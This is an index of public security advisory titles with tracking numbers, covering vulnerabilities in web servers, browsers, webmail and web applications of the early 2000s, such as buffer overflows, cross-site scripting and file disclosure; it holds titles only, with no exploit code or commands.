[1005472] IBM Web Traffic Express Caching Proxy Server Allows Cross-Site Scripting Attacks
[1005471] IBM Web Traffic Express Caching Proxy Server Can Be Crashed By Remote Users
[1005470] WebServer 4 Everyone Bounds Checking Error Lets Remote Users Crash the Server With a Long Host Field
[1005436] Microsoft Data Engine/Desktop Engine (MSDE) Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges
[1005435] Microsoft SQL Server Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges
[1005429] Cisco Catalyst CatOS Embedded Web Server Buffer Overflow Lets Remote Users Reset the Switch
[1005419] BEA WebLogic URL Parsing Bug May Let Remote Users Gain Unauthorized Access to Web Applications and Content
[1005417] Web Server 4 Everyone Can Be Crashed By Remote Users Sending Long HTTP GET Requests
[1005416] Microsoft Internet Explorer Flaw in WebBrowser Control Document Property Lets Remote Users Run Code in the My Computer Security Zone
[1005415] Symantec VelociRaptor Firewall Secure Web Proxy Lets Remote Users Cause Denial of Service Conditions
[1005414] Symantec Enterprise Firewall (Raptor Firewall) Secure Web Proxy Lets Remote Users Cause Denial of Service Conditions
[1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
[1005344] SurfControl SuperScout Bug in Web Reports Server Lets Remote Users Gain Control of the Application
[1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
[1005319] [Product May Not Be Vulnerable] CGI-Telnet Perl Script for Web Servers Discloses Password File to Remote Users
[1005310] BEA Systems WebLogic Server and Express May Return a Response to the Wrong Remote User
[1005305] EMU Webmail Input Validation Errors Disclose the Web Root Directory and Allow Cross-Site Scripting Attacks
[1005303] Zope Web Application Server ZCatalog Index Access Control Bug Discloses Files to Remote Users
[1005302] Zope Application Server Through the Web Code Input Validation Bug May Let Remote Users Shut Down the Server
[1005297] acWEB HTTP Server Bugs Let Remote Users Crash the System and Permit Cross-Site Scripting Attacks
[1005286] Web Server 4D May Disclose Passwords to Local Users
[1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
[1005276] phpWebSite Include Statement Bug Lets Remote Users Execute Arbitrary Code
[1005275] Dino's WebServer Encoded-URL Input Validation Hole Lets Remote Users View Files on the System
[1005272] Null httpd Web Server Heap Overflow Lets Remote Users Execute Arbitrary Code With Root Privileges
[1005269] Compaq Web-based Enterprise Services (WEBES) Access Control Bug May Let Remote Users Access Privileged Files
[1005262] Siemens DB4Web Application Server Lets Remote Users Initiate Arbitrary TCP Connections
[1005259] IBM WebSphere Can Be Crashed By Remote Users Sending Large HTTP Headers
[1005251] Internet Security Systems Internet Scanner Buffer Overflow in Parsing Web Responses May Let Remote Users Execute Arbitrary Code on the Scanner
[1005245] Opera Web Browser Can Be Crashed By Remote Users With Certain Large Scale Image Tag Size
[1005241] Siemens DB4Web Application Server Discloses Files on the System to Remote Users
[1005240] PlanetWeb Web Server Buffer Overflow in Processing GET Requests Lets Remote Users Execute Arbitrary Code on the System
[1005221] Lycos HTML Gear 'Guest Gear' Web Site Guestbook Input Validation Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against Guest Gear Users
[1005220] Network Associates WebShield SMTP Virus Scanner Can Be Bypassed With Fragmented 'Partial' E-mail Messages
[1005215] Mozilla Web Browser Privacy Leak May Disclose the Next Web URL You Visit to the Current Server
[1005214] KDE Konqueror URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain
[1005212] Savant Web Server Buffer Overflow Allows Remote Users to Execute Arbitrary Code on the System
[1005194] Web Server 4 Everyone Input Validation Flaw Discloses Files to Remote Users
[1005182] Microsoft Internet Explorer URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain
[1005181] Aestiva HTML/OS Web Development Suite Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks
[1005167] NullLogic's Null httpd Web Server Input Validation Bug Lets Remote Users Conduct Cross-site Scripting Attacks
[1005163] CGI Debugger Script Discloses Web Server Environment Variables to Remote Users
[1005162] FactoSystem Web Publishing System Input Validation Bugs Let Remote Users Execute SQL Commands on the Underlying Database
[1005154] SWServer Java Web Server Input Validation Hole Lets Remote Users View Files on the System Located Outside of the Document Directory
[1005147] Webmin Default Configuration for Webmin RPC Security May Allow Remote Authenticated Users to Gain Elevated Privileges in Certain Situations
[1005137] OmniHTTPd Web Server Input Validation Holes in Sample Applications Let Remote Users Conduct Cross-Site Scripting Attacks
[1005127] Microsoft Visual Studio .NET Web Projects May Disclose the Web Directory Structure to Remote Users
[1005126] Abyss Web Server Access Control Bug Lets Remote Users Gain Administrative Control of the Web Server Application
[1005089] WebEasyMail Possible Format String Hole Lets Remote Users Crash the SMTP Mail Service
[1005083] Microsoft Internet Information Server (IIS) Web Server Fails to Properly Validate Client-side Certificates, Allowing Remote Users to Impersonate Other Users or Certificate Issuers
[1005081] SteelArrow Web Application Server Buffer Overflows Let Remote Users Execute Arbitrary Code With System Level Privileges
[1005064] IceWarp Web Mail Software Input Validation Hole in Address Book Lets Remote Users Conduct Cross-site Scripting Attacks
[1005055] MyWebServer Has Buffer Overflow and Other Flaws That Can Be Exploited by Remote Users to Execute Arbitrary Code on the Server
[1005052] GoAhead Web Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System
[1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
[1005043] b2 Weblog Has Multiple Holes That Let Remote Users Inject SQL Commands, Execute Commands on the System, and Conduct Cross-site Scripting Attacks
[1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
[1005001] Falcon Web Server Input Validation Holes Let Remote Users Conduct Cross-site Scripting Attacks Against Web Server Users
[1005000] Sun iPlanet Web Server Buffer Overflow in Encoded Transfer Chunk Processing Allows Remote Users to Execute Arbitrary Code With Root Privileges
[1004971] Xitami Web Server Can Be Crashed By Remote Users Opening Multiple Concurrent Sessions
[1004969] Web Shop Manager Input Validation Bug Lets Remote Users Execute Commands on the System
[1004962] Opera Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks
[1004961] Mozilla Web Browser Input Validation Flaw in FTP View Feature May Let Remote Users Conduct Cross-Site Scripting Attacks
[1004957] Jana Web Server Buffer Overflow in Processing HTTP Commands May Let Remote Users Execute Arbitrary Code on the System
[1004953] 602Pro LAN Suite Web Server and Telnet Proxy Bugs Let Remote Users Consume All Available Memory on the System
[1004938] Ensim WEBpliance Server Management Software Lets Remote Authenticated Users Receive E-mail for Other Users on the Hosted Domain
[1004918] 'Gallery' Web-based Image Gallery Software Input Validation Flaw Lets Remote Users Execute Arbitrary Commands on the System
[1004899] IPswitch IMail Web Calendaring Service Can Be Crashed By Remote Users Sending a Malformed Request
[1004893] eUpload CGI Web-based File Upload Utility Access Control Flaw Discloses User Passwords to Remote Users
[1004887] ShoutBOX Web Comment System Lets Remote Users Cause Arbitrary Scripting Code to Be Executed By Site Visitors
[1004878] Mozilla Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network
[1004877] Microsoft Internet Explorer (IE) Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network
[1004870] Aprelium's Abyss Web Server Discloses Directory Contents to Remote Users
[1004852] Confixx Service Provider Customer Management Interface May Let Remote Users Execute Arbitrary Commands on the System
[1004851] Ipswitch IMail Server Buffer Overflow in Web Messaging Daemon Lets Remote Users Execute Arbitrary Code and Gain System Level Access
[1004842] StatsPlus Web Server Statistics Package Allows Remote Users to Inject Arbitrary Script Commands into the Statistics Log and Conduct Cross-site Scripting Attacks
[1004840] ezContents Web Content Management System Contains Multiple Flaws That Allow Remote Users to Create or Delete Directories and Inject SQL Commands and Allow Remote Authenticated Users to View Files on the System
[1004839] Mozilla Web Browser Allows Javascript Code to Read and Modify Cookies from Other Domains
[1004808] Working Resources BadBlue Web Server Uses Weak Administrator Authentication Method That May Allow Remote Users to Execute Arbitrary Commands on the System
[1004806] BadBlue File Sharing Web Server File Path Input Validation Bug Lets Remote Users Conduct Cross-Site Scripting Attacks Against BadBlue Users
[1004801] Geeklog Weblog Software Input Filtering Bug in 'Stories' and 'Comments' Lets Remote Users Conduct Cross-site Scripting Attacks
[1004799] Fastlink Software 'TheServer' Web Server Access Bug May Let Remote Users View Log File Access Passwords
[1004798] World Wide Web Offline Explorer (WWWOFFLE) Proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code on the System
[1004792] Caucho Resin Web Server Discloses Physical Path of Web Root Directory to Remote Users
[1004789] W3C Jigsaw Web Server Bugs in Processing Device Requests Let Remote Users Crash the Web Service and Determine the Web Root Directory Path
[1004773] BadBlue Web Server Can Be Crashed By Remote Users Sending Invalid Requests, Discloses Passwords to Local Users, and May Disclose Passwords and Files to Remote Users
[1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
[1004769] Northern Solutions Xeneo Web Server (aka WebMan Server) Lack of Input Validation Lets Remote Users View Files on the System
[1004765] Hosting Controller Web Hosting Software Access Control Hole Allows Remote Authorized Users to Change Other User Passwords
[1004761] Microsoft Foundation Classes (MFC) Information Server Application Programming Interface (ISAPI) 'mfc42.dll' Contains Buffer Overflows That Can Crash the System or Possibly Allow for the Remote Execution of Arbitrary Code
[1004759] ATPhttpd Web Server Buffer Overflows Let Remote Users Execute Arbitrary Code on the Server
[1004754] IBM DCE Distributed File System (DFS) Web Secure Relative Path Bug Lets Local Users Execute Arbitrary Code on the System With the Privileges of the Web Server
[1004751] Lil' HTTP Server 'pbcgi.cgi' Script Input Validation Flaw Allows Remote Users to Conduct Cross-site Scripting Attacks Against Web Server Users
[1004749] IBM AIX System Management Interface Tool (SMIT) Path Input Validation Flaw Lets Remote Authorized Users Execute Arbitrary Binaries on the System
[1004737] GoAhead Web Server Input Validation Bugs Disclose Files on the System to Remote Users and Also Permit Cross-Site Scripting Attacks
[1004731] iPlanet Web Server Input Validation Bug in Search Function Discloses Files on the System to Remote Users
[1004730] iPlanet Web Server Buffer Overflow in Search Function Lets Remote Users Execute Arbitrary Code on the Server
[1004728] BadBlue Web Server Input Validation Flaw in cleanSearchString() Function Lets Remote Users Conduct Cross-Site Scripting Attacks Against BadBlue Users
[1004726] MyWebServer Buffer Overflow in Processing GET Requests Lets Remote Users Execute Arbitrary Code on the System
[1004723] KF Web Server Discloses Directory Listings for All Web Directory Contents to Remote Users
[1004704] Squid Proxy Cache Has Buffer Overflows in Processing Gopher and FTP Data and May Incorrectly Forward Proxy Authentication Credentials to Remote Web Sites
[1004702] BEA WebLogic Server Race Condition May Let Remote Users Crash the Server
[1004699] Noguska's NOLA Web-based Accounting and Inventory Management Package Lets Remote Users Upload and Execute PHP Code
[1004694] Lotus Domino Web Server R4 May Disclose Files in the Web Root Directory to Remote Users Via URL Requests Ending With a Question Mark
[1004672] OmniHTTPd Web Server Bug in Processing Long HTTP Protocol Parameters Allows Remote Users to Crash the Web Service
[1004664] WatchGuard Firebox SOHO Default Configuration May Facilitate Brute Force Password Guessing Attacks on the Internal Interface
[1004656] Macromedia JRun Web Application Server Dot URL Bug Discloses Server Files to Remote Users
[1004653] Pramati Server Java Web Application Server Dot URL Bug Discloses Server Files to Remote Users
[1004651] Sybase EAServer Java Web Application Server Dot URL Bug Discloses Server Files to Remote Users
[1004646] ColdFusion MX Buffer Overflow When Used With Microsoft Internet Information Server (IIS) Lets Remote Users Crash the IIS Web Server or Execute Arbitrary Code
[1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
[1004630] Caucho Resin 'HelloServlet' Example Code Discloses Web Directory Path to Remote Users
[1004617] Verity Search97 Search Engine Input Validation Flaw Lets Remote Users Conduct Cross-site Scripting Attacks Against Users of Web Sites Running Search97
[1004611] AdvServer Web Server Can Be Crashed By Remote Users Sending a Single CR/LF Sequence
[1004608] BEA WebLogic Server Lets Remote Users Bypass Access Controls to Access Protected Web Pages By Using Forward Slashes in URLs
[1004581] 4D Web Server Buffer Overflow in Processing Long HTTP Requests May Let Remote Users Execute Arbitrary Code or Crash the Service
[1004568] WebBBS Bulletin Board Input Validation Flaw in 'webbbs_post.pl' Allows Remote Users to Execute Arbitrary System Commands
[1004559] NETGEAR Web Safe Router Default Configuration May Let Remote Users Gain Administrative Access to the Device
[1004558] webMathematica Input Validation Error Discloses Arbitrary Files on the System to Remote Users
[1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
[1004553] Zeroboard Web Forum Software Lets Remote Users Execute Arbitrary PHP on the Server
[1004552] Resin Web Server Discloses Files on the System to Remote Users and Allows Remote Users to Crash the Server
[1004549] Cgiemail Web Mail System May Let Remote Users Relay Mail Via the System
[1004543] Xitami Web Server GSL Templates Contain Unspecified Security Flaw
[1004532] Active! mail Web-based E-mail System Will Pass Scripts Embedded Within the Header to Be Executed on the Recipient's Web Browser
[1004531] AnalogX SimpleServer:WWW Web Server Can Be Crashed By Remote Users
[1004516] csNews Web-News CGI Script Access Control Flaws Let Remote Users View Sensitive Data, Including User Passwords, Modify Administrative Settings, and Execute Commands on the Server
[1004511] AlienForm2 CGI Script For Mailing Web Form Data Discloses Files to Remote Users and Lets Remote Users Write to Arbitrary Files
[1004510] Mozilla Web Browser Bug in Processing Stylesheets May Let Remote Users Crash the Browser
[1004507] Twibright Labs' Links Web Browser May Execute Arbitrary Code When Viewing Malformed PNG Images
[1004499] Geeklog Web Portal Software Permits Cross-Site Scripting Attacks and May Allow Remote Users to Execute Arbitrary SQL Commands on the Database Server
[1004494] W-Agora Web Forum Software Lets Remote Users Execute Arbitrary PHP Code on the Server
[1004492] SEANOX's Devwex Web Server Discloses Files Located Outside of the Web Root Directory to Remote Users and Allows Remote Users to Crash the Web Server
[1004491] php(Reactor) Web Site Software Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Authentication Cookies
[1004487] Splatt Forum Web Bulletin Board Input Validation Flaw in Filtering Image Tags Lets Remote Users Conduct Cross-Site Scripting Attacks to Steal Other Users' Authentication Cookies
[1004445] TeeKai's Tracking Online PHP Script for Tracking Web Site Users Contains Cross-Site Scripting Flaws, Allowing Remote Users to Steal Another User's Authentication Cookies
[1004442] BadBlue Web Server Has Input Validation Flaw That Lets Remote Users View Directory Contents
[1004426] Shambala Server Discloses Clear Text Passwords to Authenticated Remote Users Via FTP and Also Lets Remote Users Crash the Web Server
[1004401] Novell NetWare Enterprise Web Server Default Files Disclose Server Information to Remote Users
[1004385] Opera Web Browser Allows Malicious Servers to Silently Retrieve Files from the Victim's System
[1004381] BlueFace's Falcon Web Server Lets Remote Users Access Password-Protected Files
[1004370] Cisco Intrusion Detection System (IDS) Device Manager Bug in Web Access Feature Lets Remote Users View Files on the Sensors
[1004366] LocalWEB2000 Web Server Discloses Password-Protected Files to Remote Users
[1004365] Pharao Web Portal Software Has Multiple Flaws That Allow Remote Users to Access the System as Any User and to Read Files on the Server
[1004354] New Atlanta Communications ServletExec/ISAPI Java Server Can Be Crashed By Remote Users and Discloses the Directory Path and Files in the Web Root Directory to Remote Users
[1004350] Deerfield WebSite Pro Windows-based Web Server May Disclose CGI Source Code to Remote Users in Certain Cases
[1004337] Red Hat Stronghold Secure Web Server Sample Script ('swish') Discloses Installation Path to Remote Users
[1004336] Xitami Web Server Flaw in Processing Errors May Allow Remote Users to View CGI Source Code
[1004334] BannerWheel CGI-based Banner Display Management Software Buffer Overflows May Let Remote Users Execute Arbitrary Code Via the Management Interface
[1004319] Hosting Controller Software for Web Hosting Companies Has Input Validation Errors in 'dsnmanager.asp' and 'imp_rootdir.asp' Scripts That Allow Remote Users to View Files on the System and Upload and Copy Files With Administrator Privileges
[1004287] NOCC PHP-based Webmail Client Software Displays Message Text as HTML Without Filtering, Allowing a Remote User to Access the Victim's Mailbox Using a Cross-Site Scripting Attack
[1004284] NetWin DNews News Server Has Unspecified 'Security Fault' That May Allow Remote Users to Access the Management Interface
[1004282] mnoGoSearch SQL-based Search Engine Software Has Heap Overflow That Lets Remote Users Execute Arbitrary Code with the Privileges of the Web Server
[1004278] BEA Systems WebLogic Server and Express May Disclose an Administrative Password to Local Users
[1004277] BEA Systems WebLogic Server Default Management Servlet Discloses the Contents of Files in Certain Subdirectories to Remote Users
[1004276] Critical Path inJoin Directory Server 'iCon' Management Interface Allows Cross-Site Scripting Attacks Against Administrators
[1004260] Webmin Session ID Spoofing Hole May Allow Remote Users to Gain Root Access to the System
[1004257] Ecometry's SGDynamo Web Application Engine Allows Remote Users to Conduct Cross-Site Scripting Attacks
[1004246] Webmin User Management Tool May Allow Cross-Site Scripting Attacks
[1004237] HP-UX Virtualvault iPlanet Web Server May Allow Remote Connections to the Administration Server
[1004236] L.Y.S.I.A.S. Lidik Web Server for Microsoft Windows Systems Lets Remote Users View Files Located Anywhere on the Partition
[1004223] b2 Weblog Software Uses Relative Include Path That Allows Remote Users to Execute Arbitrary Shell Commands on the System
[1004219] Webglimpse Search Engine Filtering Flaw May Allow Remote Users to Conduct Cross-Site Scripting Attacks Against Users of Sites Running Webglimpse
[1004211] 4D Web Server Buffer Overflow in Processing Basic HTTP Authentication Lets Remote Users Crash the Server and May Allow Arbitrary Code to Be Executed
[1004184] CIDER Project's SHADOW Intrusion Detection Software Allows Remote Users to Execute Arbitrary Code on the Server with Web Server Privileges
[1004182] BEA Weblogic URL Parsing Flaw Lets Remote Users View .JSP Source Code or the Physical Installation Path and Cause Denial of Service Conditions
[1004123] Lil' HTTP Server Discloses Files Located Outside of the Web Document Directory to Remote Users and Allows Remote Users to Conduct Cross-site Scripting Attacks Against Administrators
[1004122] vqServer Java-based Web Server Sample CGI Script Allows Cross-Site Scripting Attacks
[1004121] Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users With OLE OBJECT Element Dependency Loops
[1004092] Talentsoft Web+ Buffer Overflow in Processing Cookies Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges
[1004090] Microsoft Back Office Web Administration Authentication Mechanism Can Be Bypassed By Remote Users
[1004089] WebTrends Reporting Center Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code with SYSTEM Privileges
[1004054] Macromedia ColdFusion Web Application Server Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Authentication Cookies
[1004052] IBM Lotus Domino Web Server Buffer Overflow During Authentication May Let Remote Users Crash the Web Server
[1004037] Webalizer Buffer Overflow Allows Remote Users to Execute Arbitrary Code on the Server via Reverse DNS Lookups
[1004036] StepWeb Search (SWS) Perl-based Search Engine Inadequate Access Controls Lets Remote Users Gain Administrative Access to the Search Engine
[1004033] Multiple Vulnerabilities in IBM Informix Web DataBlade Let Remote Users Execute SQL Commands on the Server
[1004032] Microsoft Internet Information Server (IIS) FTP STAT Command Bug Lets Remote Users Crash Both the FTP and the Web Services
[1004031] Microsoft Internet Information Server (IIS) URL Length Bug Lets Remote Users Crash the Web Service
[1004030] NetWare Web Search Server User Input Filtering Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks
[1004011] Microsoft Internet Information Server (IIS) Buffer Overflow in ASP Server-Side Include Function May Let Remote Users Execute Arbitrary Code on the Web Server
[1004009] Abyss Web Server Discloses Web Server Password File to Remote Users
[1004002] Microsoft Office Web Components Let Remote Users Determine if Specified Files Exist on Another User's Host
[1004001] Microsoft Office Web Components Let Remote Users Gain Full Read and Write Control Over Another User's Clipboard, Even if Clipboard Access Via Scripts is Disabled
[1004000] Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files
[1003999] Microsoft Office Web Components in Office XP Lets Remote Users Cause Malicious Scripting to Be Executed By Another User's Browser Even If Scripting is Disabled
[1003984] EMU Webmail Server Discloses Files on the Server to Remote Users
[1003969] Quik-Serv Web Server Discloses Arbitrary Files to Remote Users
[1003944] IBM Lotus Domino Server Discloses Installation Path of Web Root Directory to Remote Users Requesting DOS Devices
[1003922] Microsoft Outlook Web Access With SecurID Authentication May Allow Remote Users to Avoid the SecurID Authentication in Certain Cases
[1003912] Citrix NFuse Publishing Server Lets Remote Authenticated Users View Files Located Outside of the Web Root Directory
[1003910] Analog Web Log File Analysis Tool Allows Cross-Site Scripting Attacks
[1003908] Citrix NFuse Web Publishing Server Sample Pages Allow Cross-Site Scripting Attacks
[1003894] Instant Web Mail PHP-based Mail Client May Let Remote Users Cause Arbitrary POP Commands to Be Executed on Another User's Mail System
[1003892] WebSight Directory System Allows Remote Users to Conduct Cross-Site Scripting Attacks Against Directory Users
[1003891] AlGuest Web-based Guestbook Lets Remote Users Access the Guestbook With Administrator Privileges
[1003879] Built-In Guestbook Stand-Alone Module (Big Sam) Lets Remote Users Consume CPU Resources or Determine the Web Root Installation Path
[1003875] HP Webproxy for HP-UX VVOS Operating System May Forward Certain HTTP Requests to the Internal Network Without Fully Processing the Packet Against the Rule Set
[1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
[1003863] Webmin System Management Tool Lets Local Users Determine the Root User's Webmin Session ID and Gain Webmin Access as the Root User
[1003857] ARSC Really Simple Chat Server Discloses Web Root Directory Location to Remote Users
[1003853] Hosting Controller Web Hosting Software ASP Script Validation Bugs Let Remote Users Edit and Delete Any Files on the System, Giving the Remote Users Full Control of the System
[1003846] Sun Java Web Start Bug in Java Networking Launching Protocol (JNLP) Lets Remote Users Create Unsigned Applets That Can Access Restricted Resources
[1003829] Oblix NetPoint Web Access Control System Account Lockout Feature Fails to Lockout Repeated Incorrect Authentication Attempts
[1003822] Foundry Networks ServerIron Web Filtering Rules Can Be Bypassed By Remote Users
[1003819] Black Tie Project Web Portal Software Discloses Web Document Directory Installation Path to Remote Users
[1003815] TalentSoft Web+ Application Server Buffer Overflow Gives Remote Users SYSTEM Level Access to the Server
[1003809] PHP FirstPost Weblog Discloses Web Installation Directory to Remote Users
[1003808] ZyXEL ZyWALL Security Gateway ARP Processing Bug Lets Users on the Local Network Cause the Security Gateway's Interface to Go Down
[1003784] Pi3Web Web Server Discloses Protected Files within the System Web Document Directory to Remote Users
[1003778] Cobalt XTR User Interface Access Control Issue and File Uploading Authentication Bug Let Local Users Write to Files with Root Privileges
[1003768] Xerver Web Server Input Validation Flaw Lets Remote Users View Files on the Server and Error Handling Bug Lets Remote Users Crash the Web Service
[1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overflow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
[1003756] Microsoft Internet Information Server 4.0 .HTR Web Application Lets Users Change Their Passwords When the NT Security Policy is Configured to Prohibit Password Changing
[1003748] Endymion's Sake Mail Web Mail Java Servlet Lets Remote Users View Files on the Server
[1003747] Endymion's MailMan Web Mail Server Lets Remote Users View Files on the Server
[1003746] Talentsoft Web+ Application Server Lets Remote Users Execute Arbitrary Code with System Level Privileges
[1003743] Thttpd Web Server Filtering Flaw Lets Remote Users Steal Cookies Via Cross-Site Scripting Attacks
[1003740] Zope Web Application Content Server Proxy Role Error May Let Users Access Unauthorized Objects
[1003734] Draytek Vigor DSL Router Leaves Undocumented Management Port Open on the External (Internet-side) Interface
[1003732] Netscape Web Browser Java Environment Lets Remote Malicious Applets Redirect Web Proxy Connections
[1003731] Sun Java Runtime Environment (JRE) Lets Remote Malicious Applets Redirect Web Proxy Connections
[1003730] Microsoft Java Virtual Machine in Internet Explorer Lets Remote Malicious Applets Redirect Web Proxy Connections
[1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
[1003722] AeroMail Web Mail System Lets Remote Users Steal the Cookies of AeroMail Users and Lets Valid Remote Users Access Files on the AeroMail Server
[1003689] Internet Explorer (IE) Web Browser 'innerHTML' Property Hole Lets Remote Users Execute Programs on the Browser's Host, Even With ActiveX and Active Scripting Disabled
[1003683] Novell GroupWise Server Discloses Web Installation Path to Remote Users
[1003680] Worldgroup Software (FTP and Web Server) Buffer Overflows Let Remote Users Crash the FTP and Web Services and May Allow for Remote Code Execution
[1003676] PHP File Upload Bugs Let Remote Users Execute Arbitrary Code on a PHP-enabled Web Server
[1003668] BadBlue Web Server Lets Remote Users Traverse the Directory and View Files Located Anywhere on the System
[1003666] BadBlue Web Server Allows Remote Users to Conduct Cross Site Scripting Attacks and Run (and Propagate) Arbitrary Code on BadBlue File Sharing Servers
[1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
[1003657] ScriptEase Web Server Edition Sample Script (comment2.jse) Discloses Files Located Anywhere on the Server to Remote Users
[1003651] Citrix NFuse Web Publishing Server May Disclose Novell Directory Services (NDS) Network Information to Remote Users
[1003648] Greymatter Weblog Software Discloses Administrator Account Passwords to Remote Users in Certain Configurations
[1003632] NetWin's WebNEWS Server Has Built-in Default User Names That Cannot Be Removed and That Allow Remote Users to Gain Access
[1003631] Essentia Web Server Discloses Files Located Anywhere on the System to Remote Users and Lets Remote Users Crash the Web Service
[1003624] Avenger's News System CGI (ans.pl) Input Filtering Hole Lets Remote Users Execute Arbitrary Commands on the Web Server
[1003613] Lil' HTTP Server Discloses Files in Password Protected Directories on the Web Server to Remote Users
[1003606] Slash Code Allows Remote Users to Conduct Cross-Site Scripting Attacks to Steal Slash Web Site User Cookies
[1003603] Netwin's WebNEWS News Server CGI May Execute Arbitrary Code Supplied By Remote Users
[1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
[1003598] ScriptEase Mini WebServer Can Be Crashed By Remote Users Sending Long HTTP Requests
[1003597] Microsoft Outlook Web Access Discloses 'Include' Archive Files in the 'lib' Directory to Remote Users
[1003588] Winamp Media Player Discloses Temporary File Path to Remote Web Servers, Potentially Allowing a Remote Server to Execute Arbitrary Code on the User's PC
[1003584] Dino's WebServer Can Be Crashed By Remote Users Sending Multiple Long HTTP GET Requests
[1003581] Deerfield WebSite Web Server Software Discloses Installation Path Location to Remote Users
[1003578] Phusion Web Server Has Multiple Flaws That Let Remote Users View Files, Crash the Server, and Execute Commands and Code to Gain System Level Access
[1003576] Powie's PHP Forum (PFORUM) Web Board Authentication Flaw Lets Remote Users Login as Any Other User
[1003573] Hyper Nikki System Web Diary Software Allows Cross-Site Scripting Attacks
[1003570] Lasso Web Data Engine May Allow Remote Users to Crash the Web Server
[1003567] DCP-Portal Web Content Management Software Allows Cross-Site Scripting Attacks
[1003566] DCP-Portal Web Site Content Management Software Discloses Web Root Installation Path to Remote Users
[1003559] PrivaSec SurfSecure Web Privacy Software Fails to Block Spyware and Leaks Visited URLs to Remote Web Sites
[1003553] DansGuardian Web Content Filtering Proxy Bug Lets Remote Users Bypass File Name Extension Filtering Restrictions
[1003549] ForumPerso PHP-based Web Forum Lets Remote Users Gain Administrator Access to the Application
[1003542] SIPS Weblog Input Validation Hole Lets Remote Users Obtain Administrator Status on the Web Site
[1003541] Opera Web Browser MIME Flaw Causes 'text/plain' Pages to Be Displayed as HTML and Any Embedded Scripting to Be Executed By the Browser
[1003539] Falcon Web Server URL Parsing Bug Discloses Files in Protected Directories to Remote Users Without Requiring Authentication
[1003538] NetWin CWMail Web-Mail Server Buffer Overflow Lets Remote Users Execute Arbitrary Code on the System With the Privileges of the IIS Web Server
[1003522] PHPWebThings Web Page Creation Tool May Allow Remote Users to Modify SQL Queries
[1003516] Microsoft Internet Explorer (IE) Web Browser Has New Frame Domain Verification Bug That Lets Remote Users Obtain Files from Another User's Local File System
[1003506] CGINews Web-based News Management Application Discloses Files on the System to Remote Users
[1003503] BAVO PHP-based Web News Software Authentication Bug Lets Remote Users Gain Administrative Access to the Application
[1003501] '2037 Gestion Liens' Web Portal Software Lets Remote Users Gain Administrative Access to the Application
[1003498] Sitenews PHP-Based Web News System Lets Remote Users Add User Accounts
[1003495] IceWarp Web Mail Lets Remote Users Steal User Session IDs and Access Mail Accounts Belonging to Other Users
[1003466] Opera Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers
[1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
[1003463] eshare Expressions Web Site Software Discloses Files on the Hard Drive to Remote Users
[1003462] Microsoft Internet Explorer Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers
[1003456] WWWeBBB Web-based Bulletin Board Discloses Files on the System to Remote Users
[1003434] Microsoft ASP.NET Web Application Framework Allows Cross Site Scripting Attacks and Discloses Path Information to Remote Users
[1003431] IBM Lotus Domino Web Server Can Be Crashed By Remote Users Requesting DOS Devices in a Certain Manner
[1003430] Portix-PHP Web Portal Software Discloses Files to Remote Users and Lets Remote Users Gain Administrator Access on the Portal Application
[1003428] Lotus Domino Web Server Gives Access to Password-Protected Functions to Unauthorized Remote Users Via Malformed URLs
[1003421] NetScreen Firewalls Can Be Made Unresponsive By a Remote User on the Trusted Interface Side Conducting Port Scans Through the Firewall
[1003417] Lotus Domino Web Server Discloses User Account Validity Information to Remote Users
[1003411] NETGEAR Router Web Content Filtering Mechanism Can Be Bypassed By Remote Users With Certain Malformed HTTP GET Requests
[1003383] Hosting Controller Web Hosting Management Application Discloses Information About Valid User Account Names and Allows Brute Force Username and Password Guessing Attacks
[1003376] Ganglia Clustering Environment Web Client Lets Remote Users Execute Arbitrary Commands on the Server
[1003374] XOOPS Object-Oriented Web Portal Software Lets Remote Users Inject SQL Commands that Will Be Executed By the Underlying SQL Database
